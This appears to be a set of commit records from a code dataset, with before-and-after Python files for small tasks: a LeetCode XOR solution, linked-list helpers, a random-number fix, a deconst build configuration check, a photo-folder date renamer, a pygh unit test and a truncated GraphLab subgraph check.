Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
Add day1 of the leetcode challenge"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
<commit_before><commit_msg>Add day1 of the leetcode challenge<commit_after>"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
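The same XOR fold can be expressed without mutating the input list; an equivalent one-liner in plain Python 3, independent of the LeetCode harness:
# Equivalent non-mutating form of the XOR trick above.
from functools import reduce
from operator import xor
def single_number(nums):
    return reduce(xor, nums)
assert single_number([4, 1, 2, 1, 2]) == 4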
|
|
4dffd31c432df77f4a65f50d76d96d27079e7fe5
|
link-table/link_table.py
|
link-table/link_table.py
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
Add link list python implementation
|
Add link list python implementation
|
Python
|
apache-2.0
|
free-free/algorithm,free-free/algorithm
|
Add link list python implementation
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
<commit_before><commit_msg>Add link list python implementation<commit_after>
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
Add link list python implementationimport copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
<commit_before><commit_msg>Add link list python implementation<commit_after>import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
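A compact round-trip check for the helpers above (illustrative; it only uses functions defined in this file):
# Illustrative round-trip checks built on the helpers above.
def to_list(hd):
    out = []
    while hd is not None:
        out.append(hd.val)
        hd = hd.next
    return out
assert to_list(reverse_link_table2(create_link_table("abc"))) == ["c", "b", "a"]
assert check_palindrome(create_link_table("level"))
assert not check_palindrome(create_link_table("maed"))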
|
|
c2dd4d666e5d68a387ea48cabb99006d778b6d56
|
rng.py
|
rng.py
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
Fix python random number generator.
|
Fix python random number generator.
|
Python
|
mit
|
1yvT0s/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,tjhorner/illacceptanything,caioproiete/illacceptanything,triggerNZ/illacceptanything,illacceptanything/illacceptanything,caioproiete/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,caioproiete/illacceptanything,illacceptanything/illacceptanything,caioproiete/illacceptanything,caioproiete/illacceptanything,JeffreyCA/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,oneminot/illacceptanything,illacceptanything/illacceptanything,tjhorner/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,triggerNZ/illacceptanything,TheWhiteLlama/illacceptanything,1yvT0s/illacceptanything,ds84182/illacceptanything,paladique/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,JeffreyCA/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,TheWhiteLlama/illacceptanything,tjhorner/illacceptanything,paladique/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,paladique/illacceptanything,ultranaut/illacceptanything,oneminot/illacceptanything,paladique/illacceptanything,dushmis/illacceptanything,ds84182/illacceptanything,ds84182/illacceptanything,illacceptanything/illacceptanything,triggerNZ/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,tjhorner/illacceptanything,caioproiete/illacceptanything,ultranaut/illacceptanything,illacceptanything/illacceptanything,dushmis/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,paladique/illacceptanything,tjhorner/illacceptanything,triggerNZ/illacceptanything,dushmis/illacceptanything,triggerNZ/illacceptanything,caioproiete/illacceptanything,paladique/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything,ds84182/illacceptanything,dushmis/illacceptanything,dushmis/illacceptanything,JeffreyCA/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,dushmis/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,tjhorner/illacceptanything,1yvT0s/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,triggerNZ/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,1yvT0s/illacceptanything,triggerNZ/illacceptanything,tjhorner/illacceptanything,illacceptanything/illacceptanything,ds84182/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,1yvT0s/illacceptanything,paladique/ill
acceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,JeffreyCA/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,tjhorner/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything,oneminot/illacceptanything,ultranaut/illacceptanything,JeffreyCA/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,triggerNZ/illacceptanything,ultranaut/illacceptanything,triggerNZ/illacceptanything,paladique/illacceptanything,ds84182/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,triggerNZ/illacceptanything,oneminot/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,ds84182/illacceptanything,tjhorner/illacceptanything,paladique/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,illacceptanything/illacceptanything,ultranaut/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,1yvT0s/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
Fix python random number generator.
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
<commit_before>def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
<commit_msg>Fix python random number generator.<commit_after>
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
Fix python random number generator.from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
<commit_before>def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
<commit_msg>Fix python random number generator.<commit_after>from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
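For reproducible tests one would typically use a dedicated, seeded Random instance rather than the module-level functions; a small sketch (the seed value is arbitrary):
# Hypothetical reproducible variant; the seed value is arbitrary.
from random import Random
_rng = Random(42)
def get_seeded_random_number(start=1, end=10):
    """Like get_random_number, but repeatable across runs."""
    return _rng.randint(start, end)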
|
7d918fd407b2f5a6de3e3a47b9c7f0e510efd3aa
|
deconstrst/config.py
|
deconstrst/config.py
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
Manage the submission decision from Configuration.
|
Manage the submission decision from Configuration.
|
Python
|
apache-2.0
|
deconst/preparer-sphinx,ktbartholomew/preparer-sphinx,deconst/preparer-sphinx,ktbartholomew/preparer-sphinx
|
Manage the submission decision from Configuration.
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
<commit_before><commit_msg>Manage the submission decision from Configuration.<commit_after>
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
Manage the submission decision from Configuration.# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
<commit_before><commit_msg>Manage the submission decision from Configuration.<commit_after># -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
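A plausible call site for the class above (the exit-code convention is an assumption about the surrounding build script, not something this commit defines):
# Hypothetical call site; the surrounding build script is assumed.
import os
import sys
config = Configuration.load(os.environ)
reasons = config.skip_submit_reasons()
if reasons:
    for reason in reasons:
        print(reason)
    sys.exit(0)  # skip submission without failing the build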
|
|
69032c5fbd21b6efe66da2c2da4cfbdfd0e17803
|
scripts/convert_dates.py
|
scripts/convert_dates.py
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
Add script to convert from Sony folder name structure
|
Add script to convert from Sony folder name structure
|
Python
|
mit
|
itko/itko.github.io,itko/itko.github.io,itko/itko.github.io,itko/itko.github.io
|
Add script to convert from Sony folder name structure
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
<commit_before><commit_msg>Add script to convert from Sony folder name structure<commit_after>
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
Add script to convert from Sony folder name structureimport os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
<commit_before><commit_msg>Add script to convert from Sony folder name structure<commit_after>import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
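A slightly safer variant would validate that a folder name really parses as a DD-MM-YYYY date before renaming; the strptime guard here is an illustrative addition:
# Hypothetical guard: only rename folders whose names parse as DD-MM-YYYY.
from datetime import datetime
def safe_new_name(item):
    try:
        parsed = datetime.strptime(item, "%d-%m-%Y")
    except ValueError:
        return None  # not a date-named folder; leave it alone
    return parsed.strftime("%Y-%m-%d")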
|
|
54ea08989016cc5e8c90d98fac6d0a6f341b0a9a
|
test/__init__.py
|
test/__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
Add basic unit test support
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python
|
Python
|
bsd-3-clause
|
vcatechnology/pygh
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
<commit_before><commit_msg>Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
<commit_before><commit_msg>Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
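Standard unittest mechanics (nothing repo-specific) are enough to run the suite, e.g.:
# Typical ways to run the suite; assumes the usual unittest discovery layout.
#   python -m unittest discover test
# or, if executing the module directly:
if __name__ == '__main__':
    unittest.main()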
|
|
bf444772b650893b78dec9bacf4dcbcb749d20a5
|
check_subgraph.py
|
check_subgraph.py
|
# This technique works best if the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `subgraph` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
